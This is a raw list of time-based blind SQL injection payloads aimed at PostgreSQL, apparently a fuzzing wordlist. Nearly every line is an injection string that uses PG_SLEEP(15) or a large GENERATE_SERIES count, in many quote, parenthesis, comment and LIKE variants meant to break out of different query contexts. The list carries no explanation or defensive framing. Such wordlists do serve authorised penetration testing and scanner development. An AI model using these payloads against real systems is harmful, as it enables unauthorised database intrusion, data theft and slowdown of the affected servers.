..).("'','
'YpoU<'">cSKO
) AND 7503=(SELECT 7503 FROM PG_SLEEP(15))
') AND 7503=(SELECT 7503 FROM PG_SLEEP(15))
' AND 7503=(SELECT 7503 FROM PG_SLEEP(15))
" AND 7503=(SELECT 7503 FROM PG_SLEEP(15))
) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND (5220=5220
)) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ((1809=1809
))) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND (((5162=5162
 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))
') AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ('fUgO'='fUgO
')) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND (('jBqN'='jBqN
'))) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ((('zMJI'='zMJI
' AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND 'YjRs'='YjRs
') AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ('tiJS' LIKE 'tiJS
')) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND (('exTJ' LIKE 'exTJ
'))) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ((('FOQf' LIKE 'FOQf
' AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND 'HIRq' LIKE 'HIRq
") AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ("TYsn"="TYsn
")) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND (("Aaie"="Aaie
"))) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ((("JGtb"="JGtb
" AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND "iFLv"="iFLv
") AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ("jniY" LIKE "jniY
")) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND (("NCpt" LIKE "NCpt
"))) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ((("iyqx" LIKE "iyqx
" AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND "mJfL" LIKE "mJfL
%') AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ('%'='
%')) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND (('%'='
%'))) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ((('%'='
%' AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND '%'='
%") AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ("%"="
%")) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND (("%"="
%"))) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ((("%"="
%" AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND "%"="
%00') AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ('BrUa'='BrUa
%00')) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND (('GxtC'='GxtC
%00'))) AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND ((('lHBV'='lHBV
%00' AND 7503=(SELECT 7503 FROM PG_SLEEP(15)) AND 'SXue'='SXue
 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- spgN
 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))# xRDQ
') WHERE 9964=9964 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
") WHERE 5528=5528 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
) WHERE 5131=5131 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
' WHERE 7158=7158 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
" WHERE 7768=7768 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
 WHERE 5393=5393 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
')) AS KLKp WHERE 3376=3376 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
")) AS qdtL WHERE 4762=4762 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
)) AS EJhb WHERE 5136=5136 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
') AS PHPe WHERE 7233=7233 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
") AS pxbI WHERE 9909=9909 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
) AS Oudw WHERE 8779=8779 AND 7503=(SELECT 7503 FROM PG_SLEEP(15))-- 
'||(SELECT 'hGSk' FROM DUAL WHERE 9854=9854 AND 7503=(SELECT 7503 FROM PG_SLEEP(15)))||'
'||(SELECT 'IrHe' WHERE 3221=3221 AND 7503=(SELECT 7503 FROM PG_SLEEP(15)))||'
'+(SELECT Nhxq WHERE 6526=6526 AND 7503=(SELECT 7503 FROM PG_SLEEP(15)))+'
'+(SELECT 'fabH' WHERE 6725=6725 AND 7503=(SELECT 7503 FROM PG_SLEEP(15)))+'
' IN BOOLEAN MODE) AND 7503=(SELECT 7503 FROM PG_SLEEP(15))#
) OR 8703=(SELECT 8703 FROM PG_SLEEP(15))
') OR 8703=(SELECT 8703 FROM PG_SLEEP(15))
' OR 8703=(SELECT 8703 FROM PG_SLEEP(15))
" OR 8703=(SELECT 8703 FROM PG_SLEEP(15))
) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND (6099=6099
)) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ((7889=7889
))) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND (((8578=8578
 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))
') OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ('tBAQ'='tBAQ
')) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND (('MYhB'='MYhB
'))) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ((('IgXu'='IgXu
' OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND 'zUma'='zUma
') OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ('UULO' LIKE 'UULO
')) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND (('EkUP' LIKE 'EkUP
'))) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ((('Mcje' LIKE 'Mcje
' OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND 'ffbk' LIKE 'ffbk
") OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ("CPjl"="CPjl
")) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND (("jHmQ"="jHmQ
"))) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ((("ebEr"="ebEr
" OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND "MNWj"="MNWj
") OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ("ylWW" LIKE "ylWW
")) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND (("YQmE" LIKE "YQmE
"))) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ((("DvBL" LIKE "DvBL
" OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND "cdgW" LIKE "cdgW
%') OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ('%'='
%')) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND (('%'='
%'))) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ((('%'='
%' OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND '%'='
%") OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ("%"="
%")) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND (("%"="
%"))) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ((("%"="
%" OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND "%"="
%00') OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ('Frfo'='Frfo
%00')) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND (('szna'='szna
%00'))) OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND ((('CPCm'='CPCm
%00' OR 8703=(SELECT 8703 FROM PG_SLEEP(15)) AND 'vMkQ'='vMkQ
 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- UUBE
 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))# ZNzf
') WHERE 7616=7616 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
") WHERE 6103=6103 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
) WHERE 5922=5922 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
' WHERE 4218=4218 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
" WHERE 9962=9962 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
 WHERE 5079=5079 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
')) AS yLHw WHERE 6776=6776 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
")) AS oIMS WHERE 5995=5995 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
)) AS hERa WHERE 9384=9384 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
') AS goDV WHERE 1632=1632 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
") AS ZVtS WHERE 3387=3387 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
) AS MkRX WHERE 5834=5834 OR 8703=(SELECT 8703 FROM PG_SLEEP(15))-- 
'||(SELECT 'IoUV' FROM DUAL WHERE 4173=4173 OR 8703=(SELECT 8703 FROM PG_SLEEP(15)))||'
'||(SELECT 'lDQK' WHERE 2931=2931 OR 8703=(SELECT 8703 FROM PG_SLEEP(15)))||'
'+(SELECT iGln WHERE 1038=1038 OR 8703=(SELECT 8703 FROM PG_SLEEP(15)))+'
'+(SELECT 'avQY' WHERE 1154=1154 OR 8703=(SELECT 8703 FROM PG_SLEEP(15)))+'
' IN BOOLEAN MODE) OR 8703=(SELECT 8703 FROM PG_SLEEP(15))#
) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
') AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
' AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
" AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
)) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
))) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
')) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
'))) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
") AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
")) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
"))) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%') AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%')) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%'))) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%' AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%") AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%")) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%"))) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%" AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%00') AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%00')) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%00'))) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
%00' AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
') WHERE 9689=9689 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
") WHERE 6434=6434 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
) WHERE 9021=9021 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
' WHERE 5617=5617 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
" WHERE 7463=7463 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
 WHERE 8009=8009 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
')) AS YWGo WHERE 6613=6613 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
")) AS oZsR WHERE 6572=6572 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
)) AS fHWb WHERE 4153=4153 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
') AS rOWT WHERE 2092=2092 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
") AS nHNA WHERE 5249=5249 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
) AS lDLD WHERE 4607=4607 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
'||(SELECT 'kbWH' FROM DUAL WHERE 5860=5860 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
'||(SELECT 'rdCp' WHERE 3986=3986 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
'+(SELECT eFue WHERE 1781=1781 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
'+(SELECT 'VuIL' WHERE 8003=8003 AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
' IN BOOLEAN MODE) AND 3234=(SELECT 3234 FROM PG_SLEEP(15))--
) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
') OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
' OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
" OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
)) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
))) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
')) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
'))) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
") OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
")) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
"))) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%') OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%')) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%'))) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%' OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%") OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%")) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%"))) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%" OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%00') OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%00')) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%00'))) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
%00' OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
') WHERE 9564=9564 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
") WHERE 2162=2162 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
) WHERE 8120=8120 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
' WHERE 6837=6837 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
" WHERE 9268=9268 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
 WHERE 3284=3284 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
')) AS yCGi WHERE 3791=3791 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
")) AS bcwS WHERE 7852=7852 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
)) AS RCFg WHERE 5894=5894 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
') AS KYOK WHERE 2476=2476 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
") AS oUrH WHERE 3599=3599 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
) AS KHSw WHERE 5279=5279 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
'||(SELECT 'Gyzc' FROM DUAL WHERE 8163=8163 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
'||(SELECT 'VPSz' WHERE 7101=7101 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
'+(SELECT zuwn WHERE 3713=3713 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
'+(SELECT 'AtzZ' WHERE 5830=5830 OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
' IN BOOLEAN MODE) OR 8529=(SELECT 8529 FROM PG_SLEEP(15))--
) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
') AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
' AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
" AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (9173=9173
)) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((9813=9813
))) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (((3107=3107
 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
') AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('GEHq'='GEHq
')) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('odVS'='odVS
'))) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('oJWf'='oJWf
' AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND 'qlYA'='qlYA
') AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('XeAv' LIKE 'XeAv
')) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('NDck' LIKE 'NDck
'))) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('Wrws' LIKE 'Wrws
' AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND 'hQwP' LIKE 'hQwP
") AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ("elBy"="elBy
")) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (("vZRr"="vZRr
"))) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((("wXHa"="wXHa
" AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND "RyPP"="RyPP
") AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ("suJp" LIKE "suJp
")) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (("zryM" LIKE "zryM
"))) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((("UYef" LIKE "UYef
" AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND "QawV" LIKE "QawV
%') AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('%'='
%')) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('%'='
%'))) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('%'='
%' AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND '%'='
%") AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ("%"="
%")) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (("%"="
%"))) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((("%"="
%" AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND "%"="
%00') AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('zrkB'='zrkB
%00')) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('tzJW'='tzJW
%00'))) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('eCoN'='eCoN
%00' AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND 'UHuR'='UHuR
 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- sSRh
 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))# kQZi
') WHERE 7135=7135 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
") WHERE 8224=8224 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
) WHERE 3734=3734 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
' WHERE 3058=3058 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
" WHERE 4370=4370 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
 WHERE 1871=1871 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
')) AS GWYI WHERE 3728=3728 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
")) AS Yuak WHERE 8755=8755 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
)) AS XAzO WHERE 9243=9243 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
') AS Enfv WHERE 2320=2320 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
") AS wERm WHERE 8914=8914 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
) AS paYd WHERE 3359=3359 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
'||(SELECT 'QmHQ' FROM DUAL WHERE 6241=6241 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))||'
'||(SELECT 'CxWT' WHERE 7498=7498 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))||'
'+(SELECT prPP WHERE 1064=1064 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))+'
'+(SELECT 'nwss' WHERE 7137=7137 AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))+'
' IN BOOLEAN MODE) AND 8186=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))#
) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
') OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
' OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
" OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (5809=5809
)) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((5119=5119
))) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (((2692=2692
 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))
') OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('rsmr'='rsmr
')) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('igqj'='igqj
'))) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('ULGU'='ULGU
' OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND 'tzCg'='tzCg
') OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('OOIa' LIKE 'OOIa
')) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('IEOR' LIKE 'IEOR
'))) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('tkyQ' LIKE 'tkyQ
' OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND 'tRWW' LIKE 'tRWW
") OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ("vSLD"="vSLD
")) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (("QqCH"="QqCH
"))) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((("fRQv"="fRQv
" OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND "gkox"="gkox
") OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ("bEqt" LIKE "bEqt
")) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (("BVFi" LIKE "BVFi
"))) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((("bHkH" LIKE "bHkH
" OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND "oYtx" LIKE "oYtx
%') OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('%'='
%')) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('%'='
%'))) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('%'='
%' OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND '%'='
%") OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ("%"="
%")) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (("%"="
%"))) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((("%"="
%" OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND "%"="
%00') OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ('AmRG'='AmRG
%00')) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND (('IJLw'='IJLw
%00'))) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND ((('lChK'='lChK
%00' OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)) AND 'Tmdh'='Tmdh
 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- JPBt
 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))# GLPn
') WHERE 5971=5971 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
") WHERE 7321=7321 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
) WHERE 3997=3997 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
' WHERE 8411=8411 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
" WHERE 5207=5207 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
 WHERE 3904=3904 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
')) AS ldQM WHERE 5054=5054 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
")) AS DEjz WHERE 1931=1931 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
)) AS UKsE WHERE 2455=2455 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
') AS OQzv WHERE 1358=1358 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
") AS fnep WHERE 2204=2204 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
) AS eunE WHERE 1782=1782 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))-- 
'||(SELECT 'IYoi' FROM DUAL WHERE 2995=2995 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))||'
'||(SELECT 'TTji' WHERE 2091=2091 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))||'
'+(SELECT Fgzg WHERE 4559=4559 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))+'
'+(SELECT 'rhcS' WHERE 5013=5013 OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000)))+'
' IN BOOLEAN MODE) OR 7263=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))#
) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
') AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
' AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
" AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
)) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
))) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
 AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
')) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
'))) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
") AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
")) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
"))) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%') AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%')) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%'))) AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
%' AND 7662=(SELECT COUNT(*) FROM GENERATE_SERIES(1,15000000))--
